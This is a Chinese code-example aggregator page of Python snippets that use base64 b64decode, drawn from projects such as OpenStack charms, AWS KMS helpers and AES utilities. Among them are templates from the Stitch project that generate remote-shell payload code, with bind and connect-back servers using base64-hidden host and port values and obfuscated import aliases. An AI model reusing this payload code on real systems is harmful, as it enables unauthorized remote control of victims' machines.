python类b64decode()的实例源码

context.py 文件源码 项目:charm-plumgrid-gateway 作者: openstack 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def db_ssl(rdata, ctxt, ssl_dir):
    if 'ssl_ca' in rdata and ssl_dir:
        ca_path = os.path.join(ssl_dir, 'db-client.ca')
        with open(ca_path, 'w') as fh:
            fh.write(b64decode(rdata['ssl_ca']))

        ctxt['database_ssl_ca'] = ca_path
    elif 'ssl_ca' in rdata:
        log("Charm not setup for ssl support but ssl ca found", level=INFO)
        return ctxt

    if 'ssl_cert' in rdata:
        cert_path = os.path.join(
            ssl_dir, 'db-client.cert')
        if not os.path.exists(cert_path):
            log("Waiting 1m for ssl client cert validity", level=INFO)
            time.sleep(60)

        with open(cert_path, 'w') as fh:
            fh.write(b64decode(rdata['ssl_cert']))

        ctxt['database_ssl_cert'] = cert_path
        key_path = os.path.join(ssl_dir, 'db-client.key')
        with open(key_path, 'w') as fh:
            fh.write(b64decode(rdata['ssl_key']))

        ctxt['database_ssl_key'] = key_path

    return ctxt
context.py 文件源码 项目:charm-plumgrid-gateway 作者: openstack 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def configure_cert(self, cn=None):
        ssl_dir = os.path.join('/etc/apache2/ssl/', self.service_namespace)
        mkdir(path=ssl_dir)
        cert, key = get_cert(cn)
        if cn:
            cert_filename = 'cert_{}'.format(cn)
            key_filename = 'key_{}'.format(cn)
        else:
            cert_filename = 'cert'
            key_filename = 'key'

        write_file(path=os.path.join(ssl_dir, cert_filename),
                   content=b64decode(cert))
        write_file(path=os.path.join(ssl_dir, key_filename),
                   content=b64decode(key))
context.py 文件源码 项目:charm-plumgrid-gateway 作者: openstack 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def configure_ca(self):
        ca_cert = get_ca_cert()
        if ca_cert:
            install_ca_cert(b64decode(ca_cert))
stitch_utils.py 文件源码 项目:Stitch 作者: nathanlopez 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def decrypt(enc, aes_key=secret):
    enc = base64.b64decode(enc)
    iv = enc[:16]
    cipher = AES.new(aes_key, AES.MODE_CFB, iv )
    return cipher.decrypt( enc[16:] )
payload_code.py 文件源码 项目:Stitch 作者: nathanlopez 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def add_bind_server(BHOST,BPORT):
    return '''
    def bind_server(self):
        client_socket=None
        self.stop_bind_server = False
        # if no target is defined, we listen on all interfaces
        if dbg:
            print 'creating server'
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        target = base64.b64decode("{}")
        port = int(base64.b64decode("{}"))
        server.bind((target,port))
        server.listen(5)
        while True:
            if self.stop_bind_server:
                break
            server.settimeout(5)
            try:
                client_socket, addr = server.accept()
                server.settimeout(None)
                client_socket.settimeout(None)
            except Exception as e:
                if dbg:
                    print e
                client_socket=None
                pass
            if client_socket:
                if not self.connected:
                    self.connected = True
                    client_handler(client_socket)
                    self.connected = False
                else:
                    send(client_socket,"[!] Another stitch shell has already been established.\\n")
                    client_socket.close()
            client_socket=None
        server.close()

    def halt_bind_server(self):
        self.stop_bind_server = True\n\n'''.format(BHOST,BPORT)
payload_code.py 文件源码 项目:Stitch 作者: nathanlopez 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def add_listen_server(LHOST,LPORT):
    return '''
    def listen_server(self):
        self.stop_listen_server  = False
        while True:
            if self.stop_listen_server :
                break
            while self.connected:
                sleep(5)
                pass
            if dbg:
                print 'trying to connect'
            client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            client_socket.settimeout(5)
            target = base64.b64decode("{}")
            port = int(base64.b64decode("{}"))
            try:
                client_socket.connect((target,port))
                client_socket.settimeout(300)
                if not self.connected:
                    self.connected = True
                    client_handler(client_socket)
                    self.connected = False
                else:
                    send(client_socket,"[!] Another stitch shell has already been established.\\n")
                    client_socket.close()
            except Exception as e:
                if dbg:
                    print e
                client_socket.close()

    def halt_listen_server(self):
        self.stop_listen_server = True\n\n'''.format(LHOST,LPORT)
payload_code.py 文件源码 项目:Stitch 作者: nathanlopez 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def get_requirements():
    return '''
import os
import re
import sys
import math
import time
import socket
import base64
import shutil
import ctypes
import socket
import struct
import zipfile
import datetime
import requests
import StringIO
import platform
import threading
import subprocess
from Crypto import Random
from Crypto.Cipher import AES
from mss import ScreenshotError
from time import strftime, sleep
from contextlib import contextmanager
from base64 import b64decode as INFO
from zlib import decompress as SEC

from st_utils import *
from st_protocol import *
from st_encryption import *
'''
toxclient.py 文件源码 项目:toxxmlrpc 作者: merlink01 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def on_friend_lossless_packet_callback(self,friendId,message_type,message):
        logger.debug('Got Lossless: Friend:%s Type:%s Message:%s'%(friendId,message_type,len(message)))

        self.queue_recv_lock.acquire()
        block_number = int(message[:1])

        job_exists = False
        for entry in self.queue_recv:
            if entry['friendId'] == friendId:
                job_exists = True

        if block_number == 0:
            self.queue_recv.append({'data':message[1:],'done':False,'message_type':message_type,'friendId':friendId})
        elif block_number == 1:
            if job_exists:
                self.queue_recv[-1]['data'] += message[1:]
            else:
                logger.info('Got Bad Fragment')
        elif block_number == 2:
            if job_exists:
                self.queue_recv[-1]['done'] = True
                if message_type == 181:
                    self.queue_recv[-1]['data'] = base64.b64decode(self.queue_recv[-1]['data'])
            else:
                logger.info('Got Bad Fragment')
        else:
            self.queue_recv_lock.release()
            logger.info('Got Unknown Fragment')
            raise IOError

        self.queue_recv_lock.release()
NNTPCryptography.py 文件源码 项目:newsreap 作者: caronc 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def decode_private_key(self, encoded):
        """
        Based on spotnab, this is the gzipped version of the key
        with base64 applied to it.  We decode it and load it.

        """

        fileobj = StringIO()
        try:
            fileobj.write(b64decode(encoded))
        except TypeError:
            return False

        fileobj.seek(0L, SEEK_SET)
        private_key = None
        with GzipFile(fileobj=fileobj, mode="rb") as f:
            private_key = f.read()

        if not private_key:
            return False

        # We were successful
        if not self.load(private_key=private_key):
            return False

        return True
NNTPCryptography.py 文件源码 项目:newsreap 作者: caronc 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def decode_public_key(self, encoded):
        """
        Based on spotnab, this is the gzipped version of the key
        with base64 applied to it.  We decode it and load it.

        """
        fileobj = StringIO()
        try:
            fileobj.write(b64decode(encoded))
        except TypeError:
            return False

        fileobj.seek(0L, SEEK_SET)
        self.public_key = None
        with GzipFile(fileobj=fileobj, mode="rb") as f:
            try:
                self.public_key = serialization.load_pem_public_key(
                    f.read(),
                    backend=default_backend()
                )
            except ValueError:
                # Could not decrypt content
                return False

        if not self.public_key:
            return False

        return True
crypt.py 文件源码 项目:Starfish 作者: BillWang139967 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
def decrypt(enc):
    enc = base64.b64decode(enc)
    iv = enc[:16]
    cipher = AES.new(KEY, AES.MODE_CBC, iv )
    return unpad(cipher.decrypt(enc[16:]))
crypt.py 文件源码 项目:Starfish 作者: BillWang139967 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def decrypt(enc):
    enc = base64.b64decode(enc)
    iv = enc[:16]
    cipher = AES.new(KEY, AES.MODE_CBC, iv )
    return unpad(cipher.decrypt(enc[16:]))
delete_stack.py 文件源码 项目:aws-consolidated-admin 作者: awslabs 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def decrypt(ciphertext):
    return kms.decrypt(
        CiphertextBlob=base64.b64decode(ciphertext))['Plaintext']
update_stack.py 文件源码 项目:aws-consolidated-admin 作者: awslabs 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def decrypt(ciphertext):
    return kms.decrypt(
        CiphertextBlob=base64.b64decode(ciphertext))['Plaintext']
describe_stack.py 文件源码 项目:aws-consolidated-admin 作者: awslabs 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def decrypt(ciphertext):
    return kms.decrypt(
        CiphertextBlob=base64.b64decode(ciphertext))['Plaintext']
create_stack.py 文件源码 项目:aws-consolidated-admin 作者: awslabs 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def decrypt(ciphertext):
    return kms.decrypt(
        CiphertextBlob=base64.b64decode(ciphertext))['Plaintext']
serialize.py 文件源码 项目:python- 作者: secondtonone1 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def _b64_decode_bytes(b):
    return base64.b64decode(b.encode("ascii"))
vrmilter.py 文件源码 项目:sipxecs-voicemail-transcription 作者: andrewsauder 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def fn_extract_wav(piece):
    """Save the base64 encoded wav data in this email piece and
        return the file path and name as a string
    """
    glog('Extracting wav from piece')

    # parse this piece of the email text to merge the
    #  base64 encoded string into one line and then
    #  decode the string into binary data
    capture = False
    lines = []
    index = 0
    for line in piece.split('\n'):
        if line.strip() == "":
            capture = True
        if capture == True:
            lines.append(line.strip())
            index = index + 1

    b64_data = ''.join(lines)
    data = base64.b64decode(b64_data)

    rs_string = random_string(20)

    if not os.path.exists(GLV_TMP_PATH_TO_SAVE_VOICEMAIL):
        os.makedirs(GLV_TMP_PATH_TO_SAVE_VOICEMAIL)

    rs_path = GLV_TMP_PATH_TO_SAVE_VOICEMAIL + rs_string + '.wav'
    glog("save wav file to " + rs_path)
    with open(rs_path, 'wb') as f:
        f.write(data)

    # return temporary file path and name
    return rs_path
base.py 文件源码 项目:DCPanel 作者: vladgr 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def decrypt(text):
    """Returns original string"""
    text = base64.b64decode(text.encode())
    aes = AES.new(settings.CRYPT_KEY, AES.MODE_CFB, settings.CRYPT_IV)
    return aes.decrypt(text).decode()
json_format.py 文件源码 项目:ios-xr-grpc-python 作者: cisco-grpc-connection-libs 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def _ConvertScalarFieldValue(value, field, require_str=False):
  """Convert a single scalar field value.
  Args:
    value: A scalar value to convert the scalar field value.
    field: The descriptor of the field to convert.
    require_str: If True, the field value must be a str.
  Returns:
    The converted scalar field value
  Raises:
    ParseError: In case of convert problems.
  """
  if field.cpp_type in _INT_TYPES:
    return _ConvertInteger(value)
  elif field.cpp_type in _FLOAT_TYPES:
    return _ConvertFloat(value)
  elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
    return _ConvertBool(value, require_str)
  elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
    if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
      return base64.b64decode(value)
    else:
      # Checking for unpaired surrogates appears to be unreliable,
      # depending on the specific Python version, so we check manually.
      if _UNPAIRED_SURROGATE_PATTERN.search(value):
        raise ParseError('Unpaired surrogate')
      return value
  elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
    # Convert an enum value.
    enum_value = field.enum_type.values_by_name.get(value, None)
    if enum_value is None:
      try:
        number = int(value)
        enum_value = field.enum_type.values_by_number.get(number, None)
      except ValueError:
        raise ParseError('Invalid enum value {0} for enum type {1}.'.format(
            value, field.enum_type.full_name))
      if enum_value is None:
        raise ParseError('Invalid enum value {0} for enum type {1}.'.format(
            value, field.enum_type.full_name))
    return enum_value.number


问题


面经


文章

微信
公众号

扫码关注公众号